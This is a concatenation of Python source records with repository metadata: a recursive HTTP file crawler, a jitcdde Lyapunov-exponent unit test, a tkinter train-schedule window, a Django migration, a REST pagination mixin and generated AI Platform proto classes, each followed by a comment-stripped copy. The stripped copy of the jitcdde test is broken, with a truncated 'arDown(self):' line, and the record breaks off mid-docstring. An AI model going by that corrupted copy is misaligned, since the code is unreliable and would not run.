        return self._get_files(self.path, [], [])

    def _head(self, path):
        # Redirects are only followed on the plain-requests branch.
        return self.ftp_proxy_session.head(path) if self.ftp_proxy_session \
            else requests.head(path, allow_redirects=True)

    def _get(self, path):
        return self.ftp_proxy_session.get(path) if self.ftp_proxy_session else requests.get(path)

    def _is_downloadable(self):
        # "Downloadable" == anything whose content-type is not HTML
        # (an absent content-type also counts as downloadable).
        head = self._head(self.path)
        header = head.headers
        content_type = header.get('content-type')
        return content_type is None or 'html' not in content_type.lower()

    def _get_files(self, path, files, processed_paths):
        """Crawl ``path`` recursively, collecting downloadable files.

        Appends (FILE, url, relative_path, size_or_None) tuples to
        ``files``; ``processed_paths`` guards against revisiting URLs.
        """
        if path in processed_paths:
            return files
        processed_paths.append(path)
        # NOTE(review): _is_downloadable() inspects self.path (the root),
        # not the current `path` — for recursive calls this looks
        # suspicious; confirm against upstream history.
        if self._is_downloadable():
            head = self._head(path)
            content_length = head.headers.get('Content-Length')
            files.append((FILE, str(path), self._get_relative_path(path).strip("/"),
                          content_length if content_length is None else int(content_length)))
        else:
            # HTML index page: extract anchor targets and recurse.
            response = self._get(path)
            soup = BeautifulSoup(response.content, "html.parser", parse_only=SoupStrainer('a'))
            page_paths = set([link['href'] for link in soup.findAll('a', href=True)])
            for page_path in page_paths:
                current_host = urlparse(page_path).netloc
                if current_host:
                    # Absolute link: only follow links on the same host.
                    if page_path in processed_paths:
                        continue
                    if current_host != self.host:
                        processed_paths.append(page_path)
                        continue
                    head = self._head(page_path)
                    if head.status_code == 200:
                        self._get_files(page_path, files, processed_paths)
                else:
                    # Relative link: resolve against the current page and
                    # only descend below the wrapper's root URL.
                    parsed = urlparse(path)
                    normalized_path = "%s://%s%s" % (parsed.scheme, parsed.netloc,
                                                     posixpath.normpath(os.path.join(parsed.path, page_path)))
                    if normalized_path in processed_paths:
                        continue
                    if not normalized_path.startswith(self.path):
                        processed_paths.append(normalized_path)
                        continue
                    head = self._head(normalized_path)
                    if head.status_code == 200:
                        self._get_files(normalized_path, files, processed_paths)
                    else:
                        processed_paths.append(normalized_path)
        return files

    def _get_relative_path(self, path):
        # Root URL maps to its basename; deeper URLs are stripped of the
        # root prefix.
        if self.path == path:
            return os.path.basename(path)
        else:
            return path[len(self.path):]
| true | true |
1c2c9c7a1cf5617662b1acb6b67cef04aa34ecdd | 2,839 | py | Python | tests/test_lyaps.py | neurophysik/jitcdde | 44d7ed6ad187d3591407155b6eeb063f73e462cd | [
"BSD-3-Clause"
] | 49 | 2016-10-24T10:00:33.000Z | 2022-03-27T11:03:51.000Z | tests/test_lyaps.py | neurophysik/jitcdde | 44d7ed6ad187d3591407155b6eeb063f73e462cd | [
"BSD-3-Clause"
] | 45 | 2016-11-20T22:05:07.000Z | 2022-03-29T07:13:25.000Z | tests/test_lyaps.py | neurophysik/jitcdde | 44d7ed6ad187d3591407155b6eeb063f73e462cd | [
"BSD-3-Clause"
] | 11 | 2016-11-14T07:19:16.000Z | 2022-03-16T14:27:06.000Z | #!/usr/bin/python3
# -*- coding: utf-8 -*-
import platform
import unittest
import numpy as np
from scipy.stats import sem
from jitcdde import t, y, jitcdde_lyap
if platform.system() == "Windows":
    compile_args = None
else:
    from jitcxde_common import DEFAULT_COMPILE_ARGS
    # Debug-friendly flags; -UNDEBUG keeps C assertions enabled.
    compile_args = DEFAULT_COMPILE_ARGS+["-g","-UNDEBUG"]

# Natural frequencies of the two coupled Rössler oscillators.
omega = np.array([0.88167179, 0.87768425])
# Delay of the coupling from the first oscillator into the second.
delay = 4.5

# Right-hand side: two Rössler systems; the second one receives the
# delayed first component of the first system with coupling strength 0.25.
f = [
    omega[0] * (-y(1) - y(2)),
    omega[0] * (y(0) + 0.165 * y(1)),
    omega[0] * (0.2 + y(2) * (y(0) - 10.0)),
    omega[1] * (-y(4) - y(5)) + 0.25 * (y(0,t-delay) - y(3)),
    omega[1] * (y(3) + 0.165 * y(4)),
    omega[1] * (0.2 + y(5) * (y(3) - 10.0))
]

# Integrator tolerances and step bounds shared by all test cases.
test_parameters = {
    "rtol": 1e-7,
    "atol": 1e-7,
    "pws_rtol": 1e-3,
    "pws_atol": 1e-3,
    "first_step": 30,
    "max_step": 100,
    "min_step": 1e-30,
}

# Reference Lyapunov exponents the computed averages must reproduce.
lyap_controls = [0.0806, 0, -0.0368, -0.1184]
class TestIntegration(unittest.TestCase):
    """Integrate the coupled system and verify the Lyapunov exponents.

    Each test method only performs a different preparation/integration
    variant; the actual verification against ``lyap_controls`` happens
    in ``tearDown`` and is therefore shared by all of them.
    """
    def setUp(self):
        # Random past anchored at -delay and 0 gives a fresh initial
        # state for every run.
        self.DDE = jitcdde_lyap(f, n_lyap=len(lyap_controls))
        self.DDE.add_past_point(-delay, np.random.random(6), np.random.random(6))
        self.DDE.add_past_point(0.0, np.random.random(6), np.random.random(6))
        self.DDE.set_integration_parameters(**test_parameters)

    def test_integrate_blindly(self):
        self.DDE.integrate_blindly(100.0, 0.1)

    def test_step_on_discontinuities(self):
        self.DDE.step_on_discontinuities()

    ## Takes forever:
    # def test_Python_core(self):
    # 	self.DDE.generate_lambdas(simplify=False)
    # 	self.DDE.step_on_discontinuities(max_step=0.1)

    def tearDown(self):
        # Sample local Lyapunov exponents over a long interval, then
        # compare their weighted averages with the reference values,
        # allowing three standard errors of slack.
        lyaps = []
        weights = []
        for T in np.arange(self.DDE.t, self.DDE.t+1000, 10):
            _, lyap, weight = self.DDE.integrate(T)
            lyaps.append(lyap)
            weights.append(weight)
        lyaps = np.vstack(lyaps)
        # Discard the initial transient before averaging.
        lyap_start = 40
        for i,lyap_control in enumerate(lyap_controls):
            lyap = np.average(lyaps[lyap_start:,i], weights=weights[lyap_start:])
            stderr = sem(lyaps[lyap_start:,i])
            self.assertAlmostEqual(lyap_control, lyap, delta=3*stderr)
class TestSaveAndLoad(TestIntegration):
    """Same checks as TestIntegration, but via a compiled module that is
    saved to disk and reloaded before use."""
    def setUp(self):
        DDE_orig = jitcdde_lyap(f, n_lyap=len(lyap_controls))
        filename = DDE_orig.save_compiled(overwrite=True)
        # Reload from the saved module; delays must be re-declared since
        # they cannot be inferred from the compiled artefact.
        self.DDE = jitcdde_lyap(
            n=6,
            module_location=filename,
            delays=[delay],
            n_lyap=len(lyap_controls)
        )
        self.DDE.add_past_point(-delay, np.random.random(6), np.random.random(6))
        self.DDE.add_past_point(0.0, np.random.random(6), np.random.random(6))
        self.DDE.set_integration_parameters(**test_parameters)
class TestOMP(TestIntegration):
    """Same checks as TestIntegration, but with OpenMP-enabled
    compilation and explicit chunking."""
    def setUp(self):
        self.DDE = jitcdde_lyap(f, n_lyap=len(lyap_controls))
        self.DDE.add_past_point(-delay, np.random.random(6), np.random.random(6))
        self.DDE.add_past_point(0.0, np.random.random(6), np.random.random(6))
        self.DDE.set_integration_parameters(**test_parameters)
        self.DDE.compile_C(omp=True,chunk_size=15)
if __name__ == "__main__":
    # buffer=True suppresses test output unless a test fails.
    unittest.main(buffer=True)
| 28.676768 | 75 | 0.695315 |
import platform
import unittest
import numpy as np
from scipy.stats import sem
from jitcdde import t, y, jitcdde_lyap
if platform.system() == "Windows":
compile_args = None
else:
from jitcxde_common import DEFAULT_COMPILE_ARGS
compile_args = DEFAULT_COMPILE_ARGS+["-g","-UNDEBUG"]
omega = np.array([0.88167179, 0.87768425])
delay = 4.5
f = [
omega[0] * (-y(1) - y(2)),
omega[0] * (y(0) + 0.165 * y(1)),
omega[0] * (0.2 + y(2) * (y(0) - 10.0)),
omega[1] * (-y(4) - y(5)) + 0.25 * (y(0,t-delay) - y(3)),
omega[1] * (y(3) + 0.165 * y(4)),
omega[1] * (0.2 + y(5) * (y(3) - 10.0))
]
test_parameters = {
"rtol": 1e-7,
"atol": 1e-7,
"pws_rtol": 1e-3,
"pws_atol": 1e-3,
"first_step": 30,
"max_step": 100,
"min_step": 1e-30,
}
lyap_controls = [0.0806, 0, -0.0368, -0.1184]
class TestIntegration(unittest.TestCase):
def setUp(self):
self.DDE = jitcdde_lyap(f, n_lyap=len(lyap_controls))
self.DDE.add_past_point(-delay, np.random.random(6), np.random.random(6))
self.DDE.add_past_point(0.0, np.random.random(6), np.random.random(6))
self.DDE.set_integration_parameters(**test_parameters)
def test_integrate_blindly(self):
self.DDE.integrate_blindly(100.0, 0.1)
def test_step_on_discontinuities(self):
self.DDE.step_on_discontinuities()
arDown(self):
lyaps = []
weights = []
for T in np.arange(self.DDE.t, self.DDE.t+1000, 10):
_, lyap, weight = self.DDE.integrate(T)
lyaps.append(lyap)
weights.append(weight)
lyaps = np.vstack(lyaps)
lyap_start = 40
for i,lyap_control in enumerate(lyap_controls):
lyap = np.average(lyaps[lyap_start:,i], weights=weights[lyap_start:])
stderr = sem(lyaps[lyap_start:,i])
self.assertAlmostEqual(lyap_control, lyap, delta=3*stderr)
class TestSaveAndLoad(TestIntegration):
def setUp(self):
DDE_orig = jitcdde_lyap(f, n_lyap=len(lyap_controls))
filename = DDE_orig.save_compiled(overwrite=True)
self.DDE = jitcdde_lyap(
n=6,
module_location=filename,
delays=[delay],
n_lyap=len(lyap_controls)
)
self.DDE.add_past_point(-delay, np.random.random(6), np.random.random(6))
self.DDE.add_past_point(0.0, np.random.random(6), np.random.random(6))
self.DDE.set_integration_parameters(**test_parameters)
class TestOMP(TestIntegration):
def setUp(self):
self.DDE = jitcdde_lyap(f, n_lyap=len(lyap_controls))
self.DDE.add_past_point(-delay, np.random.random(6), np.random.random(6))
self.DDE.add_past_point(0.0, np.random.random(6), np.random.random(6))
self.DDE.set_integration_parameters(**test_parameters)
self.DDE.compile_C(omp=True,chunk_size=15)
if __name__ == "__main__":
unittest.main(buffer=True)
| true | true |
1c2c9d6642125c20bd9273e257de3b216516ac79 | 5,707 | py | Python | ch15/train-project/train_schedule/views/main.py | kxen42/Learn-Python-Programming-Third-Edition | 851ddc5e6094fadd44f31a9ad1d3876456b04372 | [
"MIT"
] | 19 | 2021-11-05T22:54:09.000Z | 2022-03-29T15:03:47.000Z | ch15/train-project/train_schedule/views/main.py | kxen42/Learn-Python-Programming-Third-Edition | 851ddc5e6094fadd44f31a9ad1d3876456b04372 | [
"MIT"
] | null | null | null | ch15/train-project/train_schedule/views/main.py | kxen42/Learn-Python-Programming-Third-Edition | 851ddc5e6094fadd44f31a9ad1d3876456b04372 | [
"MIT"
] | 26 | 2021-11-12T17:04:50.000Z | 2022-03-29T01:10:35.000Z | # train-project/train_schedule/views/main.py
import tkinter as tk
from contextlib import contextmanager
from tkinter import messagebox, ttk
from .. import APP_TITLE
from ..resources import load_binary_resource
from .stations import StationChooser
from .trains import TrainsView
# Name of the bundled application-icon resource.
ICON_FILENAME = "icon.png"


@contextmanager
def show_error():
    """A simple context manager to catch any exceptions and
    display them as error messages in an error dialog"""
    try:
        yield
    except Exception as error:
        # Broad catch is deliberate: any failure in the wrapped GUI
        # action is surfaced to the user instead of crashing the
        # mainloop.  The exception object itself is used as the message.
        messagebox.showerror(title="Error", message=error)
class MainWindow:
    """The main window for our app.

    The view communicates outwards only through virtual events
    (``<<RefreshData>>``, ``<<OpenPreferencesDialog>>`` etc.); a
    controller binds to them via :meth:`bind`/:meth:`unbind`.
    """
    def __init__(self):
        self.root = tk.Tk()
        self._set_title()
        self._set_icon()
        self._make_menus()
        content_frame = self._make_content()
        self._layout_widgets(content_frame)

    def _set_title(self):
        """Set the window title"""
        self.title = APP_TITLE
        self.root.title(self.title)
        self.root.iconname(self.title)

    def _set_icon(self):
        """Set the window icon"""
        # Keep a reference on self so the PhotoImage is not
        # garbage-collected (Tk only holds a weak association).
        self.icon = tk.PhotoImage(
            data=load_binary_resource(ICON_FILENAME)
        )
        # True: also use this icon as default for future toplevels.
        self.root.iconphoto(True, self.icon)

    def _make_menus(self):
        """Create the menubar"""
        # Disable legacy Tk "tear-off" menu entries globally.
        self.root.option_add("*tearOff", False)
        self.menubar = tk.Menu(self.root)
        self._make_app_menu()
        self._make_edit_menu()
        self._make_help_menu()
        self.root["menu"] = self.menubar

    def _make_app_menu(self):
        """Create the main application menu"""
        app_menu = tk.Menu(self.menubar)
        app_menu.add_command(
            label="Refresh",
            command=lambda: self.root.event_generate(
                "<<RefreshData>>"
            ),
            underline=0,
        )
        app_menu.add_command(
            label="Quit",
            command=self.quit,
            underline=0,
        )
        self.menubar.add_cascade(
            menu=app_menu, label=self.title, underline=0
        )

    def _make_edit_menu(self):
        """Create the 'Edit' menu"""
        edit_menu = tk.Menu(self.menubar)
        edit_menu.add_command(
            label="Preferences...",
            command=lambda: self.root.event_generate(
                "<<OpenPreferencesDialog>>"
            ),
            underline=0,
        )
        self.menubar.add_cascade(
            menu=edit_menu, label="Edit", underline=0
        )

    def _make_help_menu(self):
        """Create the 'Help' menu"""
        help_menu = tk.Menu(self.menubar)
        help_menu.add_command(
            label="About...",
            command=lambda: self.root.event_generate(
                "<<OpenAboutDialog>>"
            ),
            underline=0,
        )
        self.menubar.add_cascade(
            menu=help_menu, label="Help", underline=0
        )

    def _make_content(self):
        """Create the widgets to populate the body of the
        window"""
        content_frame = ttk.Frame(self.root, padding=(5, 5, 5, 5))
        station_frame = self._make_station_chooser(content_frame)
        station_frame.grid(row=0, column=0, sticky=tk.NSEW)
        notebook = ttk.Notebook(
            content_frame, padding=(0, 5, 0, 0)
        )
        # Arrivals show the origin station; departures the destination.
        self.arrivals_view = self._make_train_tab(
            notebook, "Arrivals", show_from=True, show_to=False
        )
        self.departures_view = self._make_train_tab(
            notebook, "Departures", show_from=False, show_to=True
        )
        notebook.grid(row=1, column=0, sticky=tk.NSEW)
        # Only the notebook row stretches with the window.
        content_frame.rowconfigure(1, weight=1)
        content_frame.columnconfigure(0, weight=1)
        return content_frame

    def _make_station_chooser(self, content_frame):
        """Create the station chooser dropdown"""
        station_frame = ttk.LabelFrame(
            content_frame, text="Station", padding=(5, 5, 5, 5)
        )
        self.station_chooser = StationChooser(station_frame)
        self.station_chooser.combobox.grid(
            row=0, column=0, sticky=tk.NSEW
        )
        station_frame.columnconfigure(0, weight=1)
        return station_frame

    def _make_train_tab(self, notebook, name, show_from, show_to):
        """Create the widgets to display either arrivals or
        departures"""
        frame = ttk.Frame(notebook, padding=(5, 5, 5, 5))
        notebook.add(frame, text=name)
        train_view = TrainsView(
            frame, show_from=show_from, show_to=show_to
        )
        # Wire a vertical scrollbar to the treeview in both directions.
        scrollbar = ttk.Scrollbar(
            frame,
            orient=tk.VERTICAL,
            command=train_view.treeview.yview,
        )
        train_view.treeview.configure(
            yscrollcommand=scrollbar.set
        )
        train_view.treeview.grid(row=0, column=0, sticky=tk.NSEW)
        scrollbar.grid(row=0, column=1, sticky=tk.NS)
        frame.rowconfigure(0, weight=1)
        frame.columnconfigure(0, weight=1)
        return train_view

    def _layout_widgets(self, content_frame):
        """Lay out the main frame of the window"""
        content_frame.grid(row=0, column=0, sticky=tk.NSEW)
        self.root.rowconfigure(0, weight=1)
        self.root.columnconfigure(0, weight=1)

    def bind(self, *args, **kwargs):
        """Proxy for the underlying window's bind method"""
        self.root.bind(*args, *kwargs)

    def unbind(self, *args, **kwargs):
        """Proxy for the underlying window's unbind method"""
        self.root.unbind(*args, *kwargs)

    def run(self):
        """Run the main loop"""
        self.root.mainloop()

    def quit(self, event=None):
        """Destroy the window and quit the app"""
        self.root.destroy()
| 29.569948 | 66 | 0.599439 |
import tkinter as tk
from contextlib import contextmanager
from tkinter import messagebox, ttk
from .. import APP_TITLE
from ..resources import load_binary_resource
from .stations import StationChooser
from .trains import TrainsView
ICON_FILENAME = "icon.png"
@contextmanager
def show_error():
try:
yield
except Exception as error:
messagebox.showerror(title="Error", message=error)
class MainWindow:
def __init__(self):
self.root = tk.Tk()
self._set_title()
self._set_icon()
self._make_menus()
content_frame = self._make_content()
self._layout_widgets(content_frame)
def _set_title(self):
self.title = APP_TITLE
self.root.title(self.title)
self.root.iconname(self.title)
def _set_icon(self):
self.icon = tk.PhotoImage(
data=load_binary_resource(ICON_FILENAME)
)
self.root.iconphoto(True, self.icon)
def _make_menus(self):
self.root.option_add("*tearOff", False)
self.menubar = tk.Menu(self.root)
self._make_app_menu()
self._make_edit_menu()
self._make_help_menu()
self.root["menu"] = self.menubar
def _make_app_menu(self):
app_menu = tk.Menu(self.menubar)
app_menu.add_command(
label="Refresh",
command=lambda: self.root.event_generate(
"<<RefreshData>>"
),
underline=0,
)
app_menu.add_command(
label="Quit",
command=self.quit,
underline=0,
)
self.menubar.add_cascade(
menu=app_menu, label=self.title, underline=0
)
def _make_edit_menu(self):
edit_menu = tk.Menu(self.menubar)
edit_menu.add_command(
label="Preferences...",
command=lambda: self.root.event_generate(
"<<OpenPreferencesDialog>>"
),
underline=0,
)
self.menubar.add_cascade(
menu=edit_menu, label="Edit", underline=0
)
def _make_help_menu(self):
help_menu = tk.Menu(self.menubar)
help_menu.add_command(
label="About...",
command=lambda: self.root.event_generate(
"<<OpenAboutDialog>>"
),
underline=0,
)
self.menubar.add_cascade(
menu=help_menu, label="Help", underline=0
)
def _make_content(self):
content_frame = ttk.Frame(self.root, padding=(5, 5, 5, 5))
station_frame = self._make_station_chooser(content_frame)
station_frame.grid(row=0, column=0, sticky=tk.NSEW)
notebook = ttk.Notebook(
content_frame, padding=(0, 5, 0, 0)
)
self.arrivals_view = self._make_train_tab(
notebook, "Arrivals", show_from=True, show_to=False
)
self.departures_view = self._make_train_tab(
notebook, "Departures", show_from=False, show_to=True
)
notebook.grid(row=1, column=0, sticky=tk.NSEW)
content_frame.rowconfigure(1, weight=1)
content_frame.columnconfigure(0, weight=1)
return content_frame
def _make_station_chooser(self, content_frame):
station_frame = ttk.LabelFrame(
content_frame, text="Station", padding=(5, 5, 5, 5)
)
self.station_chooser = StationChooser(station_frame)
self.station_chooser.combobox.grid(
row=0, column=0, sticky=tk.NSEW
)
station_frame.columnconfigure(0, weight=1)
return station_frame
def _make_train_tab(self, notebook, name, show_from, show_to):
frame = ttk.Frame(notebook, padding=(5, 5, 5, 5))
notebook.add(frame, text=name)
train_view = TrainsView(
frame, show_from=show_from, show_to=show_to
)
scrollbar = ttk.Scrollbar(
frame,
orient=tk.VERTICAL,
command=train_view.treeview.yview,
)
train_view.treeview.configure(
yscrollcommand=scrollbar.set
)
train_view.treeview.grid(row=0, column=0, sticky=tk.NSEW)
scrollbar.grid(row=0, column=1, sticky=tk.NS)
frame.rowconfigure(0, weight=1)
frame.columnconfigure(0, weight=1)
return train_view
def _layout_widgets(self, content_frame):
content_frame.grid(row=0, column=0, sticky=tk.NSEW)
self.root.rowconfigure(0, weight=1)
self.root.columnconfigure(0, weight=1)
def bind(self, *args, **kwargs):
self.root.bind(*args, *kwargs)
def unbind(self, *args, **kwargs):
self.root.unbind(*args, *kwargs)
def run(self):
self.root.mainloop()
def quit(self, event=None):
self.root.destroy()
| true | true |
1c2c9d8d053412ea306c9a10e0d6652d47090acf | 855 | py | Python | account/migrations/0004_auto_20171002_1918.py | natotthomer/nattr | f3f7b1bc67ff05f346e7f221d7f88b8500bd8e77 | [
"MIT"
] | 1 | 2017-11-10T19:55:12.000Z | 2017-11-10T19:55:12.000Z | account/migrations/0004_auto_20171002_1918.py | natotthomer/nattr | f3f7b1bc67ff05f346e7f221d7f88b8500bd8e77 | [
"MIT"
] | 9 | 2021-03-08T20:46:52.000Z | 2022-03-11T23:26:33.000Z | account/migrations/0004_auto_20171002_1918.py | natotthomer/nattr | f3f7b1bc67ff05f346e7f221d7f88b8500bd8e77 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.11.5 on 2017-10-02 19:18
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Auto-generated by Django (makemigrations): re-declares the
    # UserFollow.follower / .following foreign keys with explicit
    # on_delete=CASCADE and related_name accessors ('follows' /
    # 'followed_by') on the user model.

    dependencies = [
        ('account', '0003_auto_20170922_1544'),
    ]

    operations = [
        migrations.AlterField(
            model_name='userfollow',
            name='follower',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='follows', to=settings.AUTH_USER_MODEL),
        ),
        migrations.AlterField(
            model_name='userfollow',
            name='following',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='followed_by', to=settings.AUTH_USER_MODEL),
        ),
    ]
| 30.535714 | 138 | 0.667836 |
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('account', '0003_auto_20170922_1544'),
]
operations = [
migrations.AlterField(
model_name='userfollow',
name='follower',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='follows', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='userfollow',
name='following',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='followed_by', to=settings.AUTH_USER_MODEL),
),
]
| true | true |
1c2c9eed7b32e658c90b6a2885b2e30dd90f1dbc | 2,702 | py | Python | multinet/api/views/common.py | multinet-app/multinet-api | a658d787f0fb9ba415ed85a1e37c29953486287f | [
"Apache-2.0"
] | null | null | null | multinet/api/views/common.py | multinet-app/multinet-api | a658d787f0fb9ba415ed85a1e37c29953486287f | [
"Apache-2.0"
] | 91 | 2021-03-15T19:00:15.000Z | 2022-03-11T00:04:05.000Z | multinet/api/views/common.py | multinet-app/multinet-api | a658d787f0fb9ba415ed85a1e37c29953486287f | [
"Apache-2.0"
] | 1 | 2022-02-05T15:53:04.000Z | 2022-02-05T15:53:04.000Z | from typing import Dict, List
from arango.cursor import Cursor
from django.http.response import Http404
from django.shortcuts import get_object_or_404
from rest_framework.pagination import LimitOffsetPagination
from rest_framework.request import Request
from rest_framework_extensions.mixins import NestedViewSetMixin
from multinet.api.models import Workspace, WorkspaceRole
from multinet.api.utils.arango import ArangoQuery
class MultinetPagination(LimitOffsetPagination):
    """Standard limit/offset pagination with the project-wide default
    page size."""
    default_limit = 100
class ArangoPagination(LimitOffsetPagination):
    """Override the LimitOffsetPagination class to allow for use with arango cursors."""

    def _set_pre_query_params(self, request):
        # Capture limit/offset from the request before the AQL query runs.
        self.limit = self.get_limit(request)
        if self.limit is None:
            # NOTE(review): returning early leaves self.offset and
            # self.request unset, so paginate_queryset would fail — this
            # presumably relies on a default limit always being applied;
            # confirm.
            return None
        self.offset = self.get_offset(request)
        self.request = request

    def _set_post_query_params(self):
        if self.count > self.limit and self.template is not None:
            self.display_page_controls = True

    def paginate_queryset(self, query: ArangoQuery, request: Request) -> List[Dict]:
        """Run ``query`` with LIMIT/OFFSET applied and return one page."""
        self._set_pre_query_params(request)
        paginated_query = query.paginate(self.limit, self.offset)
        # full_count reports the total number of matching documents,
        # ignoring the LIMIT clause.
        cur: Cursor = paginated_query.execute(full_count=True)
        self.count = cur.statistics()['fullCount']
        self._set_post_query_params()
        return list(cur)
class WorkspaceChildMixin(NestedViewSetMixin):
    def get_queryset(self):
        """
        Get the queryset for workspace child enpoints.

        Check that the requeting user has appropriate permissions for the associated workspace.
        Raises Http404 (rather than 403) on private workspaces so their
        existence is not leaked to unauthorized users.
        """
        child_objects = super().get_queryset()

        # prevent warning for schema generation incompatibility
        if getattr(self, 'swagger_fake_view', False):
            return child_objects.none()

        parent_query_dict = self.get_parents_query_dict()
        workspace = get_object_or_404(
            Workspace.objects.select_related('owner'), name=parent_query_dict['workspace__name']
        )

        # No user or user permission required for public workspaces
        if workspace.public:
            return child_objects

        # Private workspace
        request_user = self.request.user
        if not request_user.is_authenticated:  # anonymous user
            raise Http404

        workspace_role = WorkspaceRole.objects.filter(
            workspace=workspace, user=request_user
        ).first()

        # If the user is at least a reader or the owner, grant access
        if workspace_role is not None or workspace.owner == request_user:
            return child_objects

        # Read access denied
        raise Http404
| 33.358025 | 96 | 0.703923 | from typing import Dict, List
from arango.cursor import Cursor
from django.http.response import Http404
from django.shortcuts import get_object_or_404
from rest_framework.pagination import LimitOffsetPagination
from rest_framework.request import Request
from rest_framework_extensions.mixins import NestedViewSetMixin
from multinet.api.models import Workspace, WorkspaceRole
from multinet.api.utils.arango import ArangoQuery
class MultinetPagination(LimitOffsetPagination):
default_limit = 100
class ArangoPagination(LimitOffsetPagination):
def _set_pre_query_params(self, request):
self.limit = self.get_limit(request)
if self.limit is None:
return None
self.offset = self.get_offset(request)
self.request = request
def _set_post_query_params(self):
if self.count > self.limit and self.template is not None:
self.display_page_controls = True
def paginate_queryset(self, query: ArangoQuery, request: Request) -> List[Dict]:
self._set_pre_query_params(request)
paginated_query = query.paginate(self.limit, self.offset)
cur: Cursor = paginated_query.execute(full_count=True)
self.count = cur.statistics()['fullCount']
self._set_post_query_params()
return list(cur)
class WorkspaceChildMixin(NestedViewSetMixin):
def get_queryset(self):
child_objects = super().get_queryset()
if getattr(self, 'swagger_fake_view', False):
return child_objects.none()
parent_query_dict = self.get_parents_query_dict()
workspace = get_object_or_404(
Workspace.objects.select_related('owner'), name=parent_query_dict['workspace__name']
)
if workspace.public:
return child_objects
request_user = self.request.user
if not request_user.is_authenticated:
raise Http404
workspace_role = WorkspaceRole.objects.filter(
workspace=workspace, user=request_user
).first()
if workspace_role is not None or workspace.owner == request_user:
return child_objects
raise Http404
| true | true |
1c2c9f83b71d4721f0a4459f61f84fd422ec0d20 | 4,817 | py | Python | google/cloud/aiplatform/v1/schema/trainingjob/definition_v1/types/automl_image_object_detection.py | nachocano/python-aiplatform | 1c6b998d9145309d79712f494a2b00b50a9a9bf4 | [
"Apache-2.0"
] | null | null | null | google/cloud/aiplatform/v1/schema/trainingjob/definition_v1/types/automl_image_object_detection.py | nachocano/python-aiplatform | 1c6b998d9145309d79712f494a2b00b50a9a9bf4 | [
"Apache-2.0"
] | 1 | 2021-02-12T23:56:38.000Z | 2021-02-12T23:56:38.000Z | google/cloud/aiplatform/v1/schema/trainingjob/definition_v1/types/automl_image_object_detection.py | nachocano/python-aiplatform | 1c6b998d9145309d79712f494a2b00b50a9a9bf4 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
# Machine-generated GAPIC proto-plus module registration; the manifest
# declares which message classes this module exports.
__protobuf__ = proto.module(
    package="google.cloud.aiplatform.v1.schema.trainingjob.definition",
    manifest={
        "AutoMlImageObjectDetection",
        "AutoMlImageObjectDetectionInputs",
        "AutoMlImageObjectDetectionMetadata",
    },
)
class AutoMlImageObjectDetection(proto.Message):
    r"""A TrainingJob that trains and uploads an AutoML Image Object
    Detection Model.

    NOTE: machine-generated code — regenerate instead of hand-editing.

    Attributes:
        inputs (google.cloud.aiplatform.v1.schema.trainingjob.definition_v1.types.AutoMlImageObjectDetectionInputs):
            The input parameters of this TrainingJob.
        metadata (google.cloud.aiplatform.v1.schema.trainingjob.definition_v1.types.AutoMlImageObjectDetectionMetadata):
            The metadata information
    """

    inputs = proto.Field(
        proto.MESSAGE, number=1, message="AutoMlImageObjectDetectionInputs",
    )

    metadata = proto.Field(
        proto.MESSAGE, number=2, message="AutoMlImageObjectDetectionMetadata",
    )
class AutoMlImageObjectDetectionInputs(proto.Message):
    r"""Input parameters for an AutoML image object-detection job.

    NOTE: machine-generated code — regenerate instead of hand-editing.

    Attributes:
        model_type (google.cloud.aiplatform.v1.schema.trainingjob.definition_v1.types.AutoMlImageObjectDetectionInputs.ModelType):

        budget_milli_node_hours (int):
            The training budget of creating this model, expressed in
            milli node hours i.e. 1,000 value in this field means 1 node
            hour. The actual metadata.costMilliNodeHours will be equal
            or less than this value. If further model training ceases to
            provide any improvements, it will stop without using the
            full budget and the metadata.successfulStopReason will be
            ``model-converged``. Note, node_hour = actual_hour \*
            number_of_nodes_involved. For modelType
            ``cloud``\ (default), the budget must be between 20,000 and
            900,000 milli node hours, inclusive. The default value is
            216,000 which represents one day in wall time, considering 9
            nodes are used. For model types ``mobile-tf-low-latency-1``,
            ``mobile-tf-versatile-1``, ``mobile-tf-high-accuracy-1`` the
            training budget must be between 1,000 and 100,000 milli node
            hours, inclusive. The default value is 24,000 which
            represents one day in wall time on a single node that is
            used.
        disable_early_stopping (bool):
            Use the entire training budget. This disables
            the early stopping feature. When false the early
            stopping feature is enabled, which means that
            AutoML Image Object Detection might stop
            training before the entire training budget has
            been used.
    """

    class ModelType(proto.Enum):
        r"""Supported model variants (cloud-hosted vs. mobile-exportable)."""
        MODEL_TYPE_UNSPECIFIED = 0
        CLOUD_HIGH_ACCURACY_1 = 1
        CLOUD_LOW_LATENCY_1 = 2
        MOBILE_TF_LOW_LATENCY_1 = 3
        MOBILE_TF_VERSATILE_1 = 4
        MOBILE_TF_HIGH_ACCURACY_1 = 5

    model_type = proto.Field(proto.ENUM, number=1, enum=ModelType,)

    budget_milli_node_hours = proto.Field(proto.INT64, number=2)

    disable_early_stopping = proto.Field(proto.BOOL, number=3)
class AutoMlImageObjectDetectionMetadata(proto.Message):
    r"""Output-only metadata of an AutoML image object-detection job.

    NOTE: machine-generated code — regenerate instead of hand-editing.

    Attributes:
        cost_milli_node_hours (int):
            The actual training cost of creating this
            model, expressed in milli node hours, i.e. 1,000
            value in this field means 1 node hour.
            Guaranteed to not exceed
            inputs.budgetMilliNodeHours.
